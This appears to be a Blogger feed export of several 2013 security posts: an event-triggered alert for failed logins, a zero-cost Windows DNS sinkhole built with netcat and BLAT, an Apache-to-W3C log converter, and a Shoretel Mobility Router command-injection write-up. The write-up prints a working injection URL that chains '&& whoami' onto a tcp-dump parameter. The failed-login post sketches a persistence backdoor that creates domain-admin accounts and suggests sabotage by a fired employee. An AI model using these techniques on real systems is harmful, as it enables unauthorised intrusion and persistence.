UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
</style>
<![endif]-->
<br />
<div class="MsoPlainText">
<span style="mso-tab-count: 1;"> </span>Account
Name:<span style="mso-tab-count: 2;"> smahoney</span></div>
<div class="MsoPlainText">
<span style="mso-spacerun: yes;"> </span><span style="mso-spacerun: yes;"> </span>Full Name:<span style="mso-spacerun: yes;"> </span>Mahoney, Sausage </div>
<div class="MsoPlainText">
<span style="mso-tab-count: 1;"> </span>Client
Address:<span style="mso-tab-count: 2;"> </span>::ffff:192.168.0.56</div>
<div class="MsoPlainText">
<span style="mso-tab-count: 1;"> </span>Failure
Code:<span style="mso-tab-count: 2;"> </span>0x18</div>
<div class="MsoPlainText">
<span style="mso-spacerun: yes;">
</span>Reason Failed: Bad Username or Password </div>
<div class="MsoPlainText">
<span style="mso-spacerun: yes;">
</span>Logged From:<span style="mso-spacerun: yes;"> </span>dc1.fakedomain.local
</div>
<div class="MsoPlainText">
<span style="mso-spacerun: yes;">
</span>Logged At:<span style="mso-spacerun: yes;"> </span>2013-04-26T08:52:35.445 </div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
That's about as good as I'm looking for. </div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
Now this setup isn't perfect, if you have multiple failed logins rapidly things are going to get messy as you're using static output names for the files. It takes about 2 seconds for the script to run so as long as you don't have multiple failed attempts from different users within 2 seconds you're golden. You could tack on a <span style="font-family: "Courier New",Courier,monospace;">%random%</span> variable to the file name to eliminate that problem. I haven't tested it yet but I'm sure it'd work and the odds that you're having enough failed logins to hit the same <span style="font-family: "Courier New",Courier,monospace;">%random%</span> variable output while the file exists is slim, and if that is happening, you've got much larger problems.</div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
There's lots and lots of interesting Event Id's that you can use this for, like when an account is created, deleted, or reaches the locked out state. Anything that registers an event in any of the event logs can be used to trigger this setup.</div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
Now, you can also use this as post exploit foothold. For example, find a service user account, one that no one has any reason to ever actually log in with, setup a task that when that particular account fails a login create a user, add them to remote desktop users group, vpn users, and domain admins group, then intentionally fail a login via the OWA page, their ancient PPTP VPN, a Sharepoint page, that RDP port they didn't block, anywhere that you can try an AD login onto the domain to trigger it. Thanks to Mark Baggett for pointing that one out here: <a href="https://isc.sans.edu/diary/Wipe+the+drive!++Stealthy+Malware+Persistence+-+Part+4/15460" target="_blank">Wipe the Drive Part 4</a></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
Or maybe you're just a vengeful IT type and want all hell to break lose when you're fired and tie an account disable / deleted task to your user account. </div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
I'm looking currently for a way to get user generated data into the event log somehow, if we can do that from some external source, and we had previous access to the server and created a task and some scripts to parse the event log info, we have the makings of a really slick backdoor.</div>
<br />
<br />
<br />
<br />Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7776905799486744720.post-35503532111818757462013-04-02T08:45:00.000-10:002013-04-02T08:45:20.269-10:00Sinkholing, with reporting, using Windows DNS, Netcat, and BLAT on a Zero Dollar BudgetSo DNS sinkholes are a pretty good idea to run internally in a company. Doing it for free is better. If you like the idea of using this, don't want to pay for it, and you run Windows, this post is for you.<br />
<br />
<br />
Currently my solution only handles HTTP connections with logging, it will still sinkhole all connections to the domains but it will log and alert you to HTTP connections only.<br />
<br />
I'm sure there's a lot of different ways you can do this. I'm using Windows Server 2K8r2 with DNS already installed in this setup, my actual setup that I will be implementing will be running some flavor of *nix and BIND, it's just more flexible. I saw lots of things that use various *nix setups and BIND but nothing that really works with Windows (for free) so I decided to take the path less traveled.<br />
<br />
This power shell script I found from the SANS institute does an AMAZING job of adding entries into Windows DNS. <a href="http://www.sans.org/windows-security/2010/08/31/windows-dns-server-blackhole-blacklist" target="_blank">Article with link to zip file with powershell script.</a> Read the whole article, it's worth it.<br />
<br />
So since we now have a power shell script that can manipulate DNS entries on our Windows DNS server we need to decide if we're going to sinkhole just one domain or a list of domains. Since making a sinkhole and scripting stuff doens't really make sense for just one entry we'll need a list of bad domains.<br />
<br />
I'm getting my list from <a href="http://malware-domains.com/" target="_blank">Malware-Domains.com</a> specifically the "Just Domains" list. I haven't vetted this list for accuracy, speed of update, false positives, or anything really. It just happened to be one of the more commonly mentioned lists I saw floating about the net. I strongly suggest you put some time in and do the research on what list to choose, it could mean the difference between a LOT of angry end users and little to no effective result and a well functioning setup.<br />
<br />
Alright, we know where the list we want is, we know what script we're going to use to create the sinkholes, including the switches we want (because you read the article, right). Now lets stitch our server portion together:<br />
<br />
I've created a Directory named C:\Sinkhole.<br />
Inside this directory I have my Sinkhole-DNS.ps1 script (from the link above, the one your read the whole way through) and this script:<br />
<br />
-=SCRIPT=-<br />
@echo off<br />if exist C:\Sinkhole\justdomains.zip del /f /q C:\Sinkhole\justdomains.zip<br />if exist C:\Sinkhole\justdomains.txt del /f/ q C:\Sinkhole\justdomains.txt<br />powershell.exe C:\sinkhole\Sinkhole-DNS.ps1 -DeleteSinkHoleDomains<br />bitsadmin /transfer MalwareDomains /download /priority normal http://www.malware-domains.com/files/justdomains.zip C:\Sinkhole\justdomains.zip<br />7zip e C:\sinkhole\justdomains.zip -oC:\sinkhole\<br />ren C:\sinkhole\justdomains justdomains.txt<br />del /f /q C:\sinkhole\justdomains.zip<br />powershell.exe C:\sinkhole\Sinkhole-DNS.ps1 -InputFile "C:\sinkhole\justdomains.txt" -SinkholeIP "10.1.1.1" -IncludeWildCard<br />
del /f /q C:\sinkhole\justdomains.txt<br />
<br />
First two commands are "just in case" house cleaning. Those two files should get nuked at the end of the script, but just in case they don't we check for and remove them before we get started.<br />
<br />
Next we use powershell to run our Sinkhole-DNS script to remove all the DNS sinkholes that were created at the last run. It's not likely that a domain that was used to host malware got clean and is now being used for legitimate traffic, but I want it to remove all the old stuff first. Keep things clean. (this can take several actual minutes)<br />
<br />
Then we have a bitsadmin command to go out and grab the domains list from malware-domains.com and save it to C:\Sinkhole\<br />
<br />
Now we use the built in windows command line utility to extract the files from the zip archive ....<br />
Oh wait, no we can't, because there is no such beast. WHY MICROSOFT WHY!!!!<br />
So we use 7zip's command line application <a href="http://www.7-zip.org/download.html" target="_blank">Download Site</a> the Command Line Version runs on x32 and x64.<br />
*Please note I renamed the 7zip executable and placed it in a separate folder and added it to the path variable for ease of access now and in the future. You can place it directly in the C:\sinkhole folder or a folder that is in your path variable.<br />
<br />
Then we rename the file justdomains to justdomains.txt. Because since it's windows I want it to have the appropriate file extension, that's why.<br />
<br />
Delete the zip file as we don't need it any longer.<br />
<br />
Run our powershell script to add all the domains to DNS and point them to our listener and logging station, 10.1.1.1 in this example (this can take several actual minutes).<br />
<br />
Delete the txt file with the domain names.<br />
<br />
I suggest creating a scheduled task for this script.<br />
<br />
Whew<br />
<br />
Okay so we now have a ton of new entries in our DNS server, it makes a mess, you can't find anything, and it's confusing. I would get a separate server from your main internal DNS servers and use this as a forwarder for them, that way you can still navigate your internal DNS stuff without having to look through a jungle. Plus, even through there are safeguards against the script deleting anything that's not in the sinkhole it's always better to be safe than sorry.<br />
<br />
We've got through the whirlwind tour of setting up the DNS server. Now we need to setup our listener and reporting station.<br />
<br />
You should be able to use any recent version of windows you want for this. I happened to have an old XP machine sitting about collecting dust so I used that. I didn't test it on 7 or 8 or 2003 or 2008 or 2012, it should work without a problem as long as your AV doesn't go all nom nom nom on the netcat / ncat executable.<br />
<br />
Okay so lets get our listener setup.<br />
<br />
I used netcat for windows, I already had it and it did what I needed. I'm sure you could use ncat and achieve the same results, likely better results with more listening ports capturing more protocols. I've used ncat before but the version I used lacked the portability that I wanted for this. I hear tell that there's now a standalone version now that doesn't require the library files to be bundled with it separately anymore. It has more advanced features and it's worth your time to check it out. <a href="http://nmap.org/ncat/" target="_blank">Ncat</a><br />
<br />
So netcat serves a dual purpose here.<br />
1. We can use netcat as a primitive web server by directing a file to it while it's listening.<br />
2. Netcat will log the HTTP request then we can send it to ourselves as an email and know what's going on.<br />
<br />
We'll also need something to send us an email with the information we've gathered from the listener.<br />
I like BLAT that's what I used, you can use something else if you want. <a href="http://www.blat.net/" target="_blank">BLAT</a><br />
<br />
This is the listener script I wrote to handle things:<br />
<br />
-=SCRIPT=-<br />
@echo off<br />cls<br />:beg<br />echo A Connection has been made to the sinkhole: > temp.txt<br />echo ------------------------------------------- >> temp.txt<br />nc -l -vv -p 80 -w 2 -s 10.1.1.1< index.html >> temp.txt<br />echo ------------------------------------------- >> temp.txt<br />echo.<br />echo %date% >> temp.txt<br />echo %time% >> temp.txt<br />for /f "tokens=3" %%a in ('netstat -ano ^| find /i "10.1.1.1:80" ^| find /i "time_wait"') do set host=%%a<br />set host=%host::=#%<br />for /f "tokens=1 delims=#" %%a in ("%host%") do set host=%%a<br />for /f "tokens=2" %%a in ('nslookup %host% ^| find /i "Name:"') do set name=%%a<br />echo From: %name% %host% >> temp.txt<br />::set date<br />set dt=%date:~4,2%.%date:~7,2%.%date:~10,4%<br />::set time<br />if %time:~0,2% LSS 10 set hr=%time:~1,1%<br />if %time:~0,2% GEQ 10 set hr=%time:~0,2%<br />if %time:~3,2% LSS 10 set mn=%time:~4,1%<br />if %time:~3,2% GEQ 10 set mn=%time:~3,2%<br />set tm=%hr%.%mn%<br />::set name<br />set name=%host%_%dt%-%tm%<br />::rename file<br />ren temp.txt %name%.txt<br />::send the alert<br />blat.exe %name%.txt -server 10.1.1.2 -subject "HTTP Sinkhole Alert- %host%" -to youremailhere@domain.com -mailfrom sinkhole@domain.com<br />
move %name%.txt old<br />set name=<br />set dt=<br />set tm=<br />goto beg<br />
<br />
Alright so I have this setup as a loop, you could probably use netcat's -L (listen harder) but I was having trouble running the rest of the commands reliably with any solution I could come up with using -L so I just make a big loop.<br />
<br />
I write out all the info I get from the listener, plus some other info, and formatting to temp.txt<br />
<br />
I start my netcat listener and pipe to it index.html. I do this because on the off chance a user tries to go to a sinkhole domain and it's been unjustly listed as such they know what's going on and to contact me. (index.html will be included below).<br />
-l is listen<br />
-vv is very verbose<br />
-w 2 is wait 2 seconds before closing the connection (timeout). You need this or else it will sit there with an open connection endlessly<br />
-s 10.1.1.1 says to bind and listen on this IP address only<br />
-p 80 is port 80<br />
<index.html will shovel index.html to anything that connects to it<br />
>> temp.txt writes everything that netcat receives to the temp file<br />
<br />
Everything else is mostly formatting.<br />
echo %date% and %time% do just what you think they do, echo the date and time.<br />
<br />
The one thing that was missing, and I have no idea why, but when netcat first gets a connection it lists who is connecting to what (10.1.1.45 connection to 10.1.1.1 port 80) but it does not output that to the log file.<br />
So this is the solution I came up with. It will work as along as only 1 connection happens at a time to the listener. It's not 100% reliable as if multiple IP's hit the sinkhole at once things will get weird.<br />
<br />
for /f "tokens=3" %%a in ('netstat -ano ^| find /i "10.1.1.1:80" ^| find /i "time_wait"') do set host=%%a<br />
<br />
This does a netstat, finds the connection in time_wait (not established as the -w 2 disconnects before this part gets ran) to the listening server on port 80, parses out to find the IP and port that connected to it and sets it to the variable %host%.<br />
Then with this<br />
set host=%host::=#%<br />
we change the ipaddress:port to ipaddress#port.<br />
We can't delimit a : on a for loop, but we can delimit a #, that way we can run a for loop and grab just the IP address that connected.<br />
for /f "tokens=1 delims=#" %%a in ("%host%") do set host=%%a<br />
Now %host% is just the IP address.<br />
Now we do another for loop with an nslookup to get the hostname, since the connection is internal we should be able to get the hostname from this:<br />
for /f "tokens=2" %%a in ('nslookup %host% ^| find /i "Name:"') do set name=%%a<br />
<br />
Next we do some date / time tomfoolery to timestamp our log file:<br />
::set date<br />set dt=%date:~4,2%.%date:~7,2%.%date:~10,4%<br />
*for my international readers: This part probably isn't going to work for you. Everyone does their date representation differently, this variable is based on the american method of displaying the date MM/DD/YYYY. You will need to adjust accordingly.<br />
<br />
::set time<br />if %time:~0,2% LSS 10 set hr=%time:~1,1%<br />if %time:~0,2% GEQ 10 set hr=%time:~0,2%<br />
if %time:~3,2% LSS 10 set mn=%time:~4,1%<br />if %time:~3,2% GEQ 10 set mn=%time:~3,2%<br />set tm=%hr%.%mn%<br />
Time gets a bit squirrely also. we have to have the less than and greater than statements to handle hours and minutes less than 10. For example if it's 08:24.49 am and you try to set a variable to 08 it's going to just end up being " 8" and it's going to mess things up since there will be a space before the 8. Same thing for the minutes.<br />
<br />
Next big thing we have is the BLAT command.<br />
You'll need the BLAT executable and the blat.dll file in the folder with the script or in a folder that's in the PATH variable.<br />
blat.exe %name%.txt -server 10.1.1.2 -subject "HTTP Sinkhole Alert-
%host%" -to youremailhere@domain.com -mailfrom sinkhole@domain.com<br />
<br />
%name%.txt is the temp.txt file renamed, it's contents are used as the body of the email.<br />
The rest is self explanatory use blat -h to see the help file. You will either want to create an internal relay connector in exchange to allow you to send the email or you can use authentication in BLAT.<br />
<br />
Then we move the now named file to the OLD directory as a log repository. That part is optional and actually you can cut out a bunch of the script if you don't want it, like the time and date tomfoolery.<br />
<br />
And that's that, we wait and see what connects to our listener.<br />
<br />
Here's some action shots:<br />
<br />
I've setup a wildcard sinkhole for blakhal0.com (not an actual domain as far as I know) on the DNS server.<br />
<br />
Here we see the wildcard matching in action:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0GnXEw9v6s3DbhTWRl6McR16fFJBqCN_qxEtNUBJZUWK24rksF0jmVJNh4FcuAijwxRz2EFvNpw6BciU9QlaN-Y31fQGqTyXIEMvjKF6S1kWwz6P4x4Any0r8tODu6YGR0jrUar9jWAk/s1600/DNSBlakholesetup.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0GnXEw9v6s3DbhTWRl6McR16fFJBqCN_qxEtNUBJZUWK24rksF0jmVJNh4FcuAijwxRz2EFvNpw6BciU9QlaN-Y31fQGqTyXIEMvjKF6S1kWwz6P4x4Any0r8tODu6YGR0jrUar9jWAk/s640/DNSBlakholesetup.bmp" width="640" /></a></div>
<br />
Here's a shot of the webpage the clients will get if they open a bad site in their browser (this is probably not going to happen often as most malware doesn't do things visibly in the browser)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWkocO1V9cE4IoimU6I_zQ1j6gzLAjgYY3eRiIyL3NgWkhZI_m-3w1X4wC4GWOLnJM6_WO-lQ6nYLeuaQqB90GTmvTGraplHV1o6S9YteA9xVsVI7X6h0TR6hWeEknW_ocxif3oWOdZjw/s1600/index.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWkocO1V9cE4IoimU6I_zQ1j6gzLAjgYY3eRiIyL3NgWkhZI_m-3w1X4wC4GWOLnJM6_WO-lQ6nYLeuaQqB90GTmvTGraplHV1o6S9YteA9xVsVI7X6h0TR6hWeEknW_ocxif3oWOdZjw/s640/index.bmp" width="640" /></a></div>
<br />
And here is the email alert you get when something has connected to the sinkhole <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZGRQTBwumAfGQujUr0LR6JKwh5uwzTAjp3_X0oSeCh1uku_LdkjzOQ-BQWJ91_PahLk5iQ8lwnGE5M35FOYDI-MrV7gJpuVPZaqycPozbpjLTZ9d0hEI5elLJyh8FRWrlXlyRtRaQW3o/s1600/email.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="434" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZGRQTBwumAfGQujUr0LR6JKwh5uwzTAjp3_X0oSeCh1uku_LdkjzOQ-BQWJ91_PahLk5iQ8lwnGE5M35FOYDI-MrV7gJpuVPZaqycPozbpjLTZ9d0hEI5elLJyh8FRWrlXlyRtRaQW3o/s640/email.bmp" width="640" /></a></div>
<br />
I like it because you get the host they attempted to connect to (Host:virus.blakhal0.com) what URI they tried to go to, in this instance nothing, the date, time and what host the connection initiated from.<br />
It will work for any URI on any domain you have sinkholed, so if they try and get /whatever/%20%20/evil.exe it'll log it. Then if you're feeling adventurous you can go get the exe and start examining it to see what would have happened, after you've put the kibosh on whatever is trying to connect in the first place.<br />
<br />
From the 3 minutes I've spent looking at it it looks like you can use ncat for ssl connections so there's that to look forward to.<br />
<br />
So for zero dollars you can have a reporting sinkhole for HTTP setup with Windows DNS. Enjoy.<br />
<br />
<br />
+Index.html<br />
<html><br /><body bgcolor="red"><br /><h1>Welcome to the IT Sinkhole</h1><br />You've arived here because the domain you are attempting to reach is currently listed as hosting malware.<br /><br><br />An alert has been sent to the IT department. <br /><br><br />Please send any additional information about how you got here to the IT department (it@domain.com)<br /><br><br />Click here to send an email:<a href="mailto:it@domain.com?Subject=Sinkhole">Email IT</a><br /></body><br /></html><br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-66745326292451335082013-02-22T07:48:00.000-10:002013-02-22T07:48:18.953-10:00Convert Apache Log Format to W3C formatA friend of mine came to me with a problem. He needs to convert his apache log format log files to W3C so that he can send them in to make sure royalties are getting collected properly.<br />
<br />
Now why they demand the files in W3C format, I don't know.<br />
<br />
After looking for, and not finding, a pre-made solution it was time to knuckle down and script that mother out.<br />
<br />
Here's a sample of one line from the apache log:<br />
<br />
127.0.0.1 - - [07/Feb/2013:00:00:16 -0600] "GET /admin.cgi ICY/1.0" 200 155 "-" "ShoutcastDSP (Mozilla Compatible)" 0<br />
<br />
Here's what the W3C format of that log looks like:<br />
<br />
127.0.0.1 127.0.01 02/07/2012 13:00:00 /admin.cgi 200 ShoutcastDSP (Mozilla Compatible) 155 0<br />
<br />
So we've got some cutting, splicing, and re-ordering to get done:<br />
<br />
<br />-=Script=-<br />
<br />
@echo off<br />setlocal enabledelayedexpansion<br />for /f "tokens=1,2,3,4,5,6,7,8,9,10,11,*" %%a in (Apache_LogFile_Format.txt) do (<br /><br />::set date<br />set datetime=%%d<br />for /f "tokens=1" %%z in ("!datetime!") do set d=!datetime:~1,2!<br />for /f "tokens=1" %%z in ("!datetime!") do set m=!datetime:~4,3! <br />for /f "tokens=1" %%z in ("!datetime!") do set y=!datetime:~8,4!<br />if "!m!"=="Jan " set mn=01<br />if "!m!"=="Feb " set mn=02<br />if "!m!"=="Mar " set mn=03<br />if "!m!"=="Apr " set mn=04<br />if "!m!"=="May " set mn=05<br />if "!m!"=="Jun " set mn=06<br />if "!m!"=="Jul " set mn=07<br />if "!m!"=="Aug " set mn=08<br />if "!m!"=="Sep " set mn=09<br />if "!m!"=="Oct " set mn=10<br />if "!m!"=="Nov " set mn=11<br />if "!m!"=="Dec " set mn=12<br /><br />::set time<br />for /f "tokens=1 delims=[" %%z in ("!datetime!") do set hh=!datetime:~13,2!<br />for /f "tokens=1 delims=[" %%z in ("!datetime!") do set mm=!datetime:~16,2!<br />for /f "tokens=1 delims=[" %%z in ("!datetime!") do set ss=!datetime:~19,2!<br /><br /><br />::replace " with #<br />for /f "tokens=* usebackq" %%w in ('%%l') do (<br />set tk=%%w<br />set tk=!tk:"=#!<br />)<br /><br />::parse out the user-agent from the duration<br />for /f "tokens=1 delims=#" %%x in ("!tk!") do set ua=%%x<br />for /f "tokens=2 delims=#" %%y in ("!tk!") do set dur=%%y<br /><br />echo %%a %%a !mn!/!d!/!y! !hh!:!mm!:!ss! %%g %%i !ua! %%j !dur! >> output.txt<br />)<br />
<br />
-= End Script=-<br />Everything is pretty straight forward until we have to parse out the useragent and duration:<br />
"ShoutcastDSP (Mozilla Compatible)" 0<br />
<br />
The user agent string can be just about anything really, varied length, so we can't delimit on the spaces or the parenthesis, it sure would be nice to delimit on the double quotes but you can't do that.<br />
So I picked up a new trick, using set to replace specific characters in a variable.<br />
So we use this set tk=!tk:"=#! the important part is "=# that's where we change the " to #. # we can use as a delimiter, suddenly splitting the user agent and duration just got easy.<br />instead of this:<br />
<br />
"ShoutcastDSP (Mozilla Compatible)" 0<br />
we end up with this:<br />
#ShoutcastDSP (Mozilla Compatible)# 0 <br />
<br />
That's is kids. Hope this helps you out.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-48294303231646895522013-02-13T08:04:00.000-10:002013-02-13T08:05:39.386-10:00Command Execution on Shoretel Mobility Router:IIWell, things didn't quite go the way I expected. Success was still had. But, in my mind it was a much lesser victory. I managed to get shell, capture, and reveal the root password, which I will be sharing with you here since I'm 99.999% sure it's the same on all the Shoretel Mobility Routers, but lets start where we left off.<br />
<br />
Last we left our hero....<br />
I had managed to find a command injection vulnerability by manipulating a post to the Commands page in the Troubleshooting area on the mobility router.<br />
<br />
Now began my quest to find a writable directory, or file, so that I could upload a file to get a shell.<br />
<br />
Well as it turns out, as the Apache user, you can't write anywhere. Even the places it says you SHOULD be able to write to, you can't. The file system is in a permanent read only state in all the places that the Apache user has rights to.<br />
<br />
So, I output a directory listing with permissions (ls -laR /) and started pouring over it looking for every place that Apache had write and execute permissions. All the places that existed were in the Read Only filesystem area.<br />
<br />
I'd like to take a moment here and point out that Linux file system layout and permissions are not my specialty. I believe I have a fairly firm grip on how to read them for misconfiguration but it's just not something I've spent a lot of time doing. I did the best I could, I may have missed something, I don't know. I'm working on sanitizing the directory listing I have so that I can post it somewhere and people with a better understanding can take a look over it and see if I missed something, should they so desire.<br />
<br />
So I sat back in my chair after attempting to echo 1 > test.txt in all the directories I could. I looked about for files that I could modify that I might be able to run as a more privileged user, I found none.<br />
<br />
Then I looked back at the troubleshooting page and saw this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2UP-bYBvo8KQJ6g33vZ4Wk0biJF6vvVfEloRkz11rdH38VcuUg2j1TmuRDLAcnGCsfTvhw6IbETTRhsGGYoGIanZMPNKtYPoLNbSO1r1SlxjZ4fCd745wVcsJOhI3VDl4qrvu1UTtiq8/s1600/packet.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2UP-bYBvo8KQJ6g33vZ4Wk0biJF6vvVfEloRkz11rdH38VcuUg2j1TmuRDLAcnGCsfTvhw6IbETTRhsGGYoGIanZMPNKtYPoLNbSO1r1SlxjZ4fCd745wVcsJOhI3VDl4qrvu1UTtiq8/s400/packet.bmp" width="400" /></a></div>
Packet Capture.<br />
Capturing packets usually requires that you have elevated permissions.<br />
<br />
As luck would have it you can chain commands on this page too, although much simpler.<br />
<br />
I set it to capture on any interface 1 packet of ICMP and output it to the browser. It pops up another page with the whole command in the address bar.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoxusQIitZzQVXFwi7eTLhopWQuHcBQTZbK_Gbg_wyT-6_i5Tp9g1YgSkXeEmCxdrtRJttpV5Kq_fXErpTHB_omP9-J1AlRoaX4wRniiWkkQOKB2RzvbjdNztz5DxZeJrfmb1HoyYm2Xo/s1600/addybar.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoxusQIitZzQVXFwi7eTLhopWQuHcBQTZbK_Gbg_wyT-6_i5Tp9g1YgSkXeEmCxdrtRJttpV5Kq_fXErpTHB_omP9-J1AlRoaX4wRniiWkkQOKB2RzvbjdNztz5DxZeJrfmb1HoyYm2Xo/s640/addybar.bmp" width="640" /></a></div>
Let's clean that up a bit<br />
<br />
https://hostaname/scripts/stream/tcp-dump?-vv -n -i any -sO -c 1 icmp<br />
<br />
I know tcp-dump, and that sure looks like a native command there. Lets see if we can see who we are:<br />
<br />
I added a && whoami to the end of the address and there at the bottom it returned: <br />
(https://hostaname/scripts/stream/tcp-dump?-vv -n -i any -sO -c 1 icmp && whoami)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx2JO3eK25Q6k8JQVnOldYkX-mtGMLRcxICJPfREla9Ahw7nCVWEq3gmab-LPV3VdcNoZz37KgvVJ9-uZc7NAXS24JsJvN2Rs6R25bYgr7zstBj0l9Zb2I1JIR7-Imrho9wXURPCkynFM/s1600/admin.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx2JO3eK25Q6k8JQVnOldYkX-mtGMLRcxICJPfREla9Ahw7nCVWEq3gmab-LPV3VdcNoZz37KgvVJ9-uZc7NAXS24JsJvN2Rs6R25bYgr7zstBj0l9Zb2I1JIR7-Imrho9wXURPCkynFM/s640/admin.bmp" width="640" /></a></div>
<br />
admin <br />
<br />
This brings about a change, I'm a privileged user, that's nice.<br />
<br />
Admin has read write execute ALL OVER the place.<br />
<br />
